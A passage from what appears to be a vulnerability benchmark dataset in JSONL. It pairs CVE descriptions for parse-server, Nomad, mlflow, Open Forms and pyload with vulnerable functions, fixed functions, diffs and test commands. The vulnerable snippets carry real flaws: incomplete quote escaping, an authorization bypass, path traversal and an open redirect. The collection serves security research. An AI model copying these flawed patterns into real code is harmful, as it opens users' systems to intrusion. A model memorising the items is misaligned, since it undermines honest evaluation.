"https://github.com/parse-community/parse-server/commit/a6e654943536932904a69b51e513507fcf90a504"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_96_1", "commit": "9c85e63", "file_path": "src/Adapters/Storage/Postgres/PostgresStorageAdapter.js", "start_line": "2632", "end_line": "2661", "snippet": "function literalizeRegexPart(s: string) {\n const matcher1 = /\\\\Q((?!\\\\E).*)\\\\E$/;\n const result1: any = s.match(matcher1);\n if (result1 && result1.length > 1 && result1.index > -1) {\n // process regex that has a beginning and an end specified for the literal text\n const prefix = s.substring(0, result1.index);\n const remaining = result1[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // process regex that has a beginning specified for the literal text\n const matcher2 = /\\\\Q((?!\\\\E).*)$/;\n const result2: any = s.match(matcher2);\n if (result2 && result2.length > 1 && result2.index > -1) {\n const prefix = s.substring(0, result2.index);\n const remaining = result2[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // remove all instances of \\Q and \\E from the remaining text & escape single quotes\n return s\n .replace(/([^\\\\])(\\\\E)/, '$1')\n .replace(/([^\\\\])(\\\\Q)/, '$1')\n .replace(/^\\\\E/, '')\n .replace(/^\\\\Q/, '')\n .replace(/([^'])'/, `$1''`)\n .replace(/^'([^'])/, `''$1`);\n}"}], "fix_func": [{"id": "fix_js_96_1", "commit": "cbefe77", "file_path": "src/Adapters/Storage/Postgres/PostgresStorageAdapter.js", "start_line": "2632", "end_line": "2661", "snippet": "function literalizeRegexPart(s: string) {\n const matcher1 = /\\\\Q((?!\\\\E).*)\\\\E$/;\n const result1: any = s.match(matcher1);\n if (result1 && result1.length > 1 && result1.index > -1) {\n // process regex that has a beginning and an end specified for the literal text\n const prefix = s.substring(0, result1.index);\n const remaining = result1[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // process regex that has a beginning specified for the literal text\n const matcher2 = /\\\\Q((?!\\\\E).*)$/;\n const result2: any = s.match(matcher2);\n if (result2 && result2.length > 1 && result2.index > -1) {\n const prefix = s.substring(0, result2.index);\n const remaining = result2[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // remove all instances of \\Q and \\E from the remaining text & escape single quotes\n return s\n .replace(/([^\\\\])(\\\\E)/, '$1')\n .replace(/([^\\\\])(\\\\Q)/, '$1')\n .replace(/^\\\\E/, '')\n .replace(/^\\\\Q/, '')\n .replace(/([^'])'/g, `$1''`)\n .replace(/^'([^'])/, `''$1`);\n}"}], "vul_patch": "--- a/src/Adapters/Storage/Postgres/PostgresStorageAdapter.js\n+++ b/src/Adapters/Storage/Postgres/PostgresStorageAdapter.js\n@@ -25,6 +25,6 @@\n .replace(/([^\\\\])(\\\\Q)/, '$1')\n .replace(/^\\\\E/, '')\n .replace(/^\\\\Q/, '')\n- .replace(/([^'])'/, `$1''`)\n+ .replace(/([^'])'/g, `$1''`)\n .replace(/^'([^'])/, `''$1`);\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-1782", "cve_description": "HashiCorp Nomad and Nomad Enterprise versions 1.5.0 up to 1.5.2 allow unauthenticated users to bypass intended ACL authorizations for clusters where mTLS is not enabled. This issue is fixed in version 1.5.3.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/hashicorp/nomad", "patch_url": ["https://github.com/hashicorp/nomad/commit/3e93b707d282b04fa0b24a3ca6cfafd4aeee3343"], "programing_language": "Go", "vul_func": [{"id": "vul_go_153_1", "commit": "d014fe6", "file_path": "nomad/acl.go", "start_line": 30, "end_line": 132, "snippet": "func (s *Server) Authenticate(ctx *RPCContext, args structs.RequestWithIdentity) error {\n\n\t// get the user ACLToken or anonymous token\n\tsecretID := args.GetAuthToken()\n\taclToken, err := s.ResolveSecretToken(secretID)\n\n\tswitch {\n\tcase err == nil:\n\t\t// If ACLs are disabled or we have a non-anonymous token, return that.\n\t\tif aclToken == nil || aclToken != structs.AnonymousACLToken {\n\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\t\treturn nil\n\t\t}\n\n\tcase errors.Is(err, structs.ErrTokenExpired):\n\t\treturn err\n\n\tcase errors.Is(err, structs.ErrTokenInvalid):\n\t\t// if it's not a UUID it might be an identity claim\n\t\tclaims, err := s.VerifyClaim(secretID)\n\t\tif err != nil {\n\t\t\t// we already know the token wasn't valid for an ACL in the state\n\t\t\t// store, so if we get an error at this point we have an invalid\n\t\t\t// token and there are no other options but to bail out\n\t\t\treturn err\n\t\t}\n\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{Claims: claims})\n\t\treturn nil\n\n\tcase errors.Is(err, structs.ErrTokenNotFound):\n\t\t// Check if the secret ID is the leader's secret ID, in which case treat\n\t\t// it as a management token.\n\t\tleaderAcl := s.getLeaderAcl()\n\t\tif leaderAcl != \"\" && secretID == leaderAcl {\n\t\t\taclToken = structs.LeaderACLToken\n\t\t\tbreak\n\t\t} else {\n\t\t\t// Otherwise, see if the secret ID belongs to a node. We should\n\t\t\t// reach this point only on first connection.\n\t\t\tnode, err := s.State().NodeBySecretID(nil, secretID)\n\t\t\tif err != nil {\n\t\t\t\t// this is a go-memdb error; shouldn't happen\n\t\t\t\treturn fmt.Errorf(\"could not resolve node secret: %w\", err)\n\t\t\t}\n\t\t\tif node != nil {\n\t\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: node.ID})\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t\t// we were passed a bogus token so we'll return an error, but we'll also\n\t\t// want to capture the IP for metrics\n\t\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\t\tif err != nil {\n\t\t\ts.logger.Error(\"could not determine remote address\", \"error\", err)\n\t\t}\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{RemoteIP: remoteIP})\n\t\treturn structs.ErrPermissionDenied\n\n\tdefault: // any other error\n\t\treturn fmt.Errorf(\"could not resolve user: %w\", err)\n\n\t}\n\n\t// If there's no context we're in a \"static\" handler which only happens for\n\t// cases where the leader is making RPCs internally (volumewatcher and\n\t// deploymentwatcher)\n\tif ctx == nil {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\treturn nil\n\t}\n\n\t// At this point we either have an anonymous token or an invalid one.\n\n\t// Previously-connected clients will have a NodeID set on the context, which\n\t// is available for all yamux streams over the same yamux session (and TCP\n\t// connection). This will be a large portion of the RPCs sent, but we can't\n\t// fast-path this at the top of the method, because authenticated HTTP\n\t// requests to the clients will come in over to the same session.\n\tif ctx.NodeID != \"\" {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: ctx.NodeID})\n\t\treturn nil\n\t}\n\n\t// Unlike clients that provide their Node ID on first connection, server\n\t// RPCs don't include an ID for the server so we identify servers by cert\n\t// and IP address.\n\tidentity := &structs.AuthenticatedIdentity{ACLToken: aclToken}\n\tif ctx.TLS {\n\t\tidentity.TLSName = ctx.Certificate().Subject.CommonName\n\t}\n\n\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\tif err != nil {\n\t\ts.logger.Error(\n\t\t\t\"could not authenticate RPC request or determine remote address\", \"error\", err)\n\t\treturn err\n\t}\n\tidentity.RemoteIP = remoteIP\n\targs.SetIdentity(identity)\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_153_1", "commit": "3e93b70", "file_path": "nomad/acl.go", "start_line": 30, "end_line": 129, "snippet": "func (s *Server) Authenticate(ctx *RPCContext, args structs.RequestWithIdentity) error {\n\n\t// get the user ACLToken or anonymous token\n\tsecretID := args.GetAuthToken()\n\taclToken, err := s.ResolveSecretToken(secretID)\n\n\tswitch {\n\tcase err == nil:\n\t\t// If ACLs are disabled or we have a non-anonymous token, return that.\n\t\tif aclToken == nil || aclToken != structs.AnonymousACLToken {\n\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\t\treturn nil\n\t\t}\n\n\tcase errors.Is(err, structs.ErrTokenExpired):\n\t\treturn err\n\n\tcase errors.Is(err, structs.ErrTokenInvalid):\n\t\t// if it's not a UUID it might be an identity claim\n\t\tclaims, err := s.VerifyClaim(secretID)\n\t\tif err != nil {\n\t\t\t// we already know the token wasn't valid for an ACL in the state\n\t\t\t// store, so if we get an error at this point we have an invalid\n\t\t\t// token and there are no other options but to bail out\n\t\t\treturn err\n\t\t}\n\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{Claims: claims})\n\t\treturn nil\n\n\tcase errors.Is(err, structs.ErrTokenNotFound):\n\t\t// Check if the secret ID is the leader's secret ID, in which case treat\n\t\t// it as a management token.\n\t\tleaderAcl := s.getLeaderAcl()\n\t\tif leaderAcl != \"\" && secretID == leaderAcl {\n\t\t\taclToken = structs.LeaderACLToken\n\t\t\tbreak\n\t\t} else {\n\t\t\t// Otherwise, see if the secret ID belongs to a node. We should\n\t\t\t// reach this point only on first connection.\n\t\t\tnode, err := s.State().NodeBySecretID(nil, secretID)\n\t\t\tif err != nil {\n\t\t\t\t// this is a go-memdb error; shouldn't happen\n\t\t\t\treturn fmt.Errorf(\"could not resolve node secret: %w\", err)\n\t\t\t}\n\t\t\tif node != nil {\n\t\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: node.ID})\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t\t// we were passed a bogus token so we'll return an error, but we'll also\n\t\t// want to capture the IP for metrics\n\t\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\t\tif err != nil {\n\t\t\ts.logger.Error(\"could not determine remote address\", \"error\", err)\n\t\t}\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{RemoteIP: remoteIP})\n\t\treturn structs.ErrPermissionDenied\n\n\tdefault: // any other error\n\t\treturn fmt.Errorf(\"could not resolve user: %w\", err)\n\n\t}\n\n\t// If there's no context we're in a \"static\" handler which only happens for\n\t// cases where the leader is making RPCs internally (volumewatcher and\n\t// deploymentwatcher)\n\tif ctx == nil {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\treturn nil\n\t}\n\n\t// At this point we either have an anonymous token or an invalid one.\n\n\t// TODO(tgross): remove this entirely in 1.6.0 and enforce that all RPCs\n\t// driven by the clients have secret IDs set\n\tif ctx.NodeID != \"\" && secretID != \"\" {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: ctx.NodeID})\n\t\treturn nil\n\t}\n\n\t// Unlike clients that provide their Node ID on first connection, server\n\t// RPCs don't include an ID for the server so we identify servers by cert\n\t// and IP address.\n\tidentity := &structs.AuthenticatedIdentity{ACLToken: aclToken}\n\tif ctx.TLS {\n\t\tidentity.TLSName = ctx.Certificate().Subject.CommonName\n\t}\n\n\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\tif err != nil {\n\t\ts.logger.Error(\n\t\t\t\"could not authenticate RPC request or determine remote address\", \"error\", err)\n\t\treturn err\n\t}\n\tidentity.RemoteIP = remoteIP\n\targs.SetIdentity(identity)\n\treturn nil\n}"}], "vul_patch": "--- a/nomad/acl.go\n+++ b/nomad/acl.go\n@@ -73,12 +73,9 @@\n \n \t// At this point we either have an anonymous token or an invalid one.\n \n-\t// Previously-connected clients will have a NodeID set on the context, which\n-\t// is available for all yamux streams over the same yamux session (and TCP\n-\t// connection). This will be a large portion of the RPCs sent, but we can't\n-\t// fast-path this at the top of the method, because authenticated HTTP\n-\t// requests to the clients will come in over to the same session.\n-\tif ctx.NodeID != \"\" {\n+\t// TODO(tgross): remove this entirely in 1.6.0 and enforce that all RPCs\n+\t// driven by the clients have secret IDs set\n+\tif ctx.NodeID != \"\" && secretID != \"\" {\n \t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: ctx.NodeID})\n \t\treturn nil\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-30172", "cve_description": "A directory traversal vulnerability in the /get-artifact API method of the mlflow platform up to v2.0.1 allows attackers to read arbitrary files on the server via the path parameter.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/mlflow/mlflow", "patch_url": ["https://github.com/mlflow/mlflow/commit/ac4b697bb0bb8a331944dca63f4235b4bf602ab8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_30_1", "commit": "d1c7621", "file_path": "mlflow/server/handlers.py", "start_line": 528, "end_line": 546, "snippet": "def get_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n run_id = request_dict.get(\"run_id\") or request_dict.get(\"run_uuid\")\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=request_dict[\"path\"],\n )\n else:\n artifact_repo = _get_artifact_repo(run)\n artifact_path = request_dict[\"path\"]\n\n return _send_artifact(artifact_repo, artifact_path)"}, {"id": "vul_py_30_2", "commit": "d1c7621", "file_path": "mlflow/server/handlers.py", "start_line": 887, "end_line": 916, "snippet": "def _list_artifacts():\n request_message = _get_request_message(\n ListArtifacts(),\n schema={\n \"run_id\": [_assert_string, _assert_required],\n \"path\": [_assert_string],\n \"page_token\": [_assert_string],\n },\n )\n response_message = ListArtifacts.Response()\n if request_message.HasField(\"path\"):\n path = request_message.path\n else:\n path = None\n run_id = request_message.run_id or request_message.run_uuid\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_entities = _list_artifacts_for_proxied_run_artifact_root(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=path,\n )\n else:\n artifact_entities = _get_artifact_repo(run).list_artifacts(path)\n\n response_message.files.extend([a.to_proto() for a in artifact_entities])\n response_message.root_uri = run.info.artifact_uri\n response = Response(mimetype=\"application/json\")\n response.set_data(message_to_json(response_message))\n return response"}, {"id": "vul_py_30_3", "commit": "d1c7621", "file_path": "mlflow/server/handlers.py", "start_line": 1269, "end_line": 1288, "snippet": "def get_model_version_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n name = request_dict.get(\"name\")\n version = request_dict.get(\"version\")\n artifact_uri = _get_model_registry_store().get_model_version_download_uri(name, version)\n\n if _is_servable_proxied_run_artifact_root(artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=artifact_uri,\n relative_path=request_dict[\"path\"],\n )\n else:\n artifact_repo = get_artifact_repository(artifact_uri)\n artifact_path = request_dict[\"path\"]\n\n return _send_artifact(artifact_repo, artifact_path)"}], "fix_func": [{"id": "fix_py_30_1", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 548, "end_line": 568, "snippet": "def get_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n run_id = request_dict.get(\"run_id\") or request_dict.get(\"run_uuid\")\n path = request_dict[\"path\"]\n validate_path_is_safe(path)\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=path,\n )\n else:\n artifact_repo = _get_artifact_repo(run)\n artifact_path = path\n\n return _send_artifact(artifact_repo, artifact_path)"}, {"id": "fix_py_30_2", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 909, "end_line": 939, "snippet": "def _list_artifacts():\n request_message = _get_request_message(\n ListArtifacts(),\n schema={\n \"run_id\": [_assert_string, _assert_required],\n \"path\": [_assert_string],\n \"page_token\": [_assert_string],\n },\n )\n response_message = ListArtifacts.Response()\n if request_message.HasField(\"path\"):\n path = request_message.path\n validate_path_is_safe(path)\n else:\n path = None\n run_id = request_message.run_id or request_message.run_uuid\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_entities = _list_artifacts_for_proxied_run_artifact_root(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=path,\n )\n else:\n artifact_entities = _get_artifact_repo(run).list_artifacts(path)\n\n response_message.files.extend([a.to_proto() for a in artifact_entities])\n response_message.root_uri = run.info.artifact_uri\n response = Response(mimetype=\"application/json\")\n response.set_data(message_to_json(response_message))\n return response"}, {"id": "fix_py_30_3", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 1292, "end_line": 1312, "snippet": "def get_model_version_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n name = request_dict.get(\"name\")\n version = request_dict.get(\"version\")\n path = request_dict[\"path\"]\n validate_path_is_safe(path)\n artifact_uri = _get_model_registry_store().get_model_version_download_uri(name, version)\n if _is_servable_proxied_run_artifact_root(artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=artifact_uri,\n relative_path=path,\n )\n else:\n artifact_repo = get_artifact_repository(artifact_uri)\n artifact_path = path\n\n return _send_artifact(artifact_repo, artifact_path)"}, {"id": "fix_py_30_4", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 530, "end_line": 544, "snippet": "def validate_path_is_safe(path):\n \"\"\"\n Validates that the specified path is safe to join with a trusted prefix. This is a security\n measure to prevent path traversal attacks. The implementation is based on\n `werkzeug.security.safe_join` (https://github.com/pallets/werkzeug/blob/a3005e6acda7246fe0a684c71921bf4882b4ba1c/src/werkzeug/security.py#L110).\n \"\"\"\n if path != \"\":\n path = posixpath.normpath(path)\n if (\n any(sep in path for sep in _os_alt_seps)\n or os.path.isabs(path)\n or path == \"..\"\n or path.startswith(\"../\")\n ):\n raise MlflowException(f\"Invalid path: {path}\", error_code=INVALID_PARAMETER_VALUE)"}, {"id": "fix_py_30_5", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 527, "end_line": 527, "snippet": "_os_alt_seps = list(sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != \"/\")"}], "vul_patch": "--- a/mlflow/server/handlers.py\n+++ b/mlflow/server/handlers.py\n@@ -4,16 +4,18 @@\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n run_id = request_dict.get(\"run_id\") or request_dict.get(\"run_uuid\")\n+ path = request_dict[\"path\"]\n+ validate_path_is_safe(path)\n run = _get_tracking_store().get_run(run_id)\n \n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=run.info.artifact_uri,\n- relative_path=request_dict[\"path\"],\n+ relative_path=path,\n )\n else:\n artifact_repo = _get_artifact_repo(run)\n- artifact_path = request_dict[\"path\"]\n+ artifact_path = path\n \n return _send_artifact(artifact_repo, artifact_path)\n\n--- a/mlflow/server/handlers.py\n+++ b/mlflow/server/handlers.py\n@@ -10,6 +10,7 @@\n response_message = ListArtifacts.Response()\n if request_message.HasField(\"path\"):\n path = request_message.path\n+ validate_path_is_safe(path)\n else:\n path = None\n run_id = request_message.run_id or request_message.run_uuid\n\n--- a/mlflow/server/handlers.py\n+++ b/mlflow/server/handlers.py\n@@ -5,16 +5,17 @@\n request_dict = parser.parse(query_string, normalized=True)\n name = request_dict.get(\"name\")\n version = request_dict.get(\"version\")\n+ path = request_dict[\"path\"]\n+ validate_path_is_safe(path)\n artifact_uri = _get_model_registry_store().get_model_version_download_uri(name, version)\n-\n if _is_servable_proxied_run_artifact_root(artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=artifact_uri,\n- relative_path=request_dict[\"path\"],\n+ relative_path=path,\n )\n else:\n artifact_repo = get_artifact_repository(artifact_uri)\n- artifact_path = request_dict[\"path\"]\n+ artifact_path = path\n \n return _send_artifact(artifact_repo, artifact_path)\n\n--- /dev/null\n+++ b/mlflow/server/handlers.py\n@@ -0,0 +1,15 @@\n+def validate_path_is_safe(path):\n+ \"\"\"\n+ Validates that the specified path is safe to join with a trusted prefix. This is a security\n+ measure to prevent path traversal attacks. The implementation is based on\n+ `werkzeug.security.safe_join` (https://github.com/pallets/werkzeug/blob/a3005e6acda7246fe0a684c71921bf4882b4ba1c/src/werkzeug/security.py#L110).\n+ \"\"\"\n+ if path != \"\":\n+ path = posixpath.normpath(path)\n+ if (\n+ any(sep in path for sep in _os_alt_seps)\n+ or os.path.isabs(path)\n+ or path == \"..\"\n+ or path.startswith(\"../\")\n+ ):\n+ raise MlflowException(f\"Invalid path: {path}\", error_code=INVALID_PARAMETER_VALUE)\n\n--- /dev/null\n+++ b/mlflow/server/handlers.py\n@@ -0,0 +1 @@\n+_os_alt_seps = list(sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != \"/\")\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-30172:latest\n# bash /workspace/fix-run.sh\nset -e\nexport PATH=\"/workspace/PoC_env/CVE-2023-30172/bin:$PATH\"\ncd /workspace/mlflow\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-30172/bin/python -m pytest tests/tracking/test_rest_tracking.py::test_path_validation tests/tracking/test_rest_tracking.py::test_validate_path_is_safe_good tests/tracking/test_rest_tracking.py::test_validate_path_is_safe_bad\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-30172:latest\n# bash /workspace/unit_test.sh\nset -e\nexport PATH=\"/workspace/PoC_env/CVE-2023-30172/bin:$PATH\"\ncd /workspace/mlflow\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-30172/bin/python -m pytest tests/tracking/test_rest_tracking.py -k \"not test_log_model[file] and not test_log_model[sqlalchemy] and not test_artifacts[file] and not test_artifacts[sqlalchemy]\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-31040", "cve_description": "Open Forms is an application for creating and publishing smart forms. Prior to versions 1.0.9 and 1.1.1, the cookie consent page in Open Forms contains an open redirect by injecting a `referer` querystring parameter and failing to validate the value. A malicious actor is able to redirect users to a website under their control, opening them up for phishing attacks. The redirect is initiated by the open forms backend which is a legimate page, making it less obvious to end users they are being redirected to a malicious website. Versions 1.0.9 and 1.1.1 contain patches for this issue. There are no known workarounds avaialble.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/open-formulieren/open-forms", "patch_url": ["https://github.com/open-formulieren/open-forms/commit/3e8c9cce386e548765783354694fbb9d7a6ea7d3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_265_1", "commit": "908a36a", "file_path": "src/openforms/utils/redirect.py", "start_line": 13, "end_line": 30, "snippet": "def allow_redirect_url(url: str) -> bool:\n \"\"\"\n Check that a redirect target is allowed against the CORS policy.\n\n The \"Cross-Origin Resource Sharing\" configuration specifies which external hosts\n are allowed to access Open Forms. We leverage this configuration to block or allow\n redirects to external hosts.\n \"\"\"\n cors = CorsMiddleware()\n origin = origin_from_url(url)\n parts = urlparse(url)\n\n if not cors_conf.CORS_ALLOW_ALL_ORIGINS and not cors.origin_found_in_white_lists(\n origin, parts\n ):\n return False\n else:\n return True"}], "fix_func": [{"id": "fix_py_265_1", "commit": "3e8c9cc", "file_path": "src/openforms/utils/redirect.py", "start_line": 16, "end_line": 47, "snippet": "def allow_redirect_url(url: str) -> bool:\n \"\"\"\n Check that a redirect target is allowed against the CORS policy.\n\n The \"Cross-Origin Resource Sharing\" configuration specifies which external hosts\n are allowed to access Open Forms. We leverage this configuration to block or allow\n redirects to external hosts.\n \"\"\"\n # first, check if the URL is in ALLOWED_HOSTS. We deliberately exclude the wildcard\n # setting to require explicit configuration either via ALLOWED_HOSTS or CORS_* settings.\n allowed_hosts_check = url_has_allowed_host_and_scheme(\n url=url,\n allowed_hosts=[host for host in settings.ALLOWED_HOSTS if host != \"*\"],\n # settings.ALLOWED_HOSTS means we are serving the domain, so we can enforce our\n # own custom HTTPS setting.\n require_https=settings.IS_HTTPS,\n )\n # if we pass via ALLOWED_HOSTS, short-circuit, otherwise we check the CORS policy\n # for allowed external domains.\n if allowed_hosts_check:\n return True\n\n cors = CorsMiddleware()\n origin = origin_from_url(url)\n parts = urlparse(url)\n\n if not cors_conf.CORS_ALLOW_ALL_ORIGINS and not cors.origin_found_in_white_lists(\n origin, parts\n ):\n return False\n else:\n return True"}, {"id": "fix_py_265_2", "commit": "3e8c9cc", "file_path": "src/openforms/forms/templatetags/openforms.py", "start_line": 37, "end_line": 50, "snippet": "def get_allowed_redirect_url(*candidates: str) -> str:\n \"\"\"\n Output the first variable passed that is not empty and is an allowed redirect URL.\n\n Output nothing if none of the values satisfy the requirements.\n\n Heavily insired on the builtin {% firstof %} tag.\n \"\"\"\n for candidate in candidates:\n if not candidate:\n continue\n if allow_redirect_url(candidate):\n return candidate\n return \"\""}], "vul_patch": "--- a/src/openforms/utils/redirect.py\n+++ b/src/openforms/utils/redirect.py\n@@ -6,6 +6,20 @@\n are allowed to access Open Forms. We leverage this configuration to block or allow\n redirects to external hosts.\n \"\"\"\n+ # first, check if the URL is in ALLOWED_HOSTS. We deliberately exclude the wildcard\n+ # setting to require explicit configuration either via ALLOWED_HOSTS or CORS_* settings.\n+ allowed_hosts_check = url_has_allowed_host_and_scheme(\n+ url=url,\n+ allowed_hosts=[host for host in settings.ALLOWED_HOSTS if host != \"*\"],\n+ # settings.ALLOWED_HOSTS means we are serving the domain, so we can enforce our\n+ # own custom HTTPS setting.\n+ require_https=settings.IS_HTTPS,\n+ )\n+ # if we pass via ALLOWED_HOSTS, short-circuit, otherwise we check the CORS policy\n+ # for allowed external domains.\n+ if allowed_hosts_check:\n+ return True\n+\n cors = CorsMiddleware()\n origin = origin_from_url(url)\n parts = urlparse(url)\n\n--- /dev/null\n+++ b/src/openforms/utils/redirect.py\n@@ -0,0 +1,14 @@\n+def get_allowed_redirect_url(*candidates: str) -> str:\n+ \"\"\"\n+ Output the first variable passed that is not empty and is an allowed redirect URL.\n+\n+ Output nothing if none of the values satisfy the requirements.\n+\n+ Heavily insired on the builtin {% firstof %} tag.\n+ \"\"\"\n+ for candidate in candidates:\n+ if not candidate:\n+ continue\n+ if allow_redirect_url(candidate):\n+ return candidate\n+ return \"\"\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-0227", "cve_description": "Insufficient Session Expiration in GitHub repository pyload/pyload prior to 0.5.0b3.dev36.", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/pyload/pyload", "patch_url": ["https://github.com/pyload/pyload/commit/c035714c0596b704b11af0f8a669352f128ad2d9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_335_1", "commit": "a7e1616", "file_path": "src/pyload/webui/app/helpers.py", "start_line": 166, "end_line": 169, "snippet": "def is_authenticated(session=flask.session):\n return session.get(\"name\") and session.get(\n \"authenticated\"\n ) # NOTE: why checks name?"}], "fix_func": [{"id": "fix_py_335_1", "commit": "c035714c0596b704b11af0f8a669352f128ad2d9", "file_path": "src/pyload/webui/app/helpers.py", "start_line": 166, "end_line": 171, "snippet": "def is_authenticated(session=flask.session):\n api = flask.current_app.config[\"PYLOAD_API\"]\n user = session.get(\"name\")\n authenticated = session.get(\"authenticated\")\n\n return authenticated and api.user_exists(user)"}, {"id": "fix_py_335_2", "commit": "c035714c0596b704b11af0f8a669352f128ad2d9", "file_path": "src/pyload/core/api/__init__.py", "start_line": 1233, "end_line": 1241, "snippet": " def user_exists(self, username):\n \"\"\"\n Check if a user actually exists in the database.\n\n :param username:\n :return: boolean\n \"\"\"\n return self.pyload.db.user_exists(username)\n"}, {"id": "fix_py_335_3", "commit": "c035714c0596b704b11af0f8a669352f128ad2d9", "file_path": "src/pyload/core/database/user_database.py", "start_line": 95, "end_line": 99, "snippet": " @style.queue\n def user_exists(self, user):\n self.c.execute(\"SELECT name FROM users WHERE name=?\", (user,))\n return self.c.fetchone() is not None\n"}], "vul_patch": "--- a/src/pyload/webui/app/helpers.py\n+++ b/src/pyload/webui/app/helpers.py\n@@ -1,4 +1,6 @@\n def is_authenticated(session=flask.session):\n- return session.get(\"name\") and session.get(\n- \"authenticated\"\n- ) # NOTE: why checks name?\n+ api = flask.current_app.config[\"PYLOAD_API\"]\n+ user = session.get(\"name\")\n+ authenticated = session.get(\"authenticated\")\n+\n+ return authenticated and api.user_exists(user)\n\n--- /dev/null\n+++ b/src/pyload/webui/app/helpers.py\n@@ -0,0 +1,8 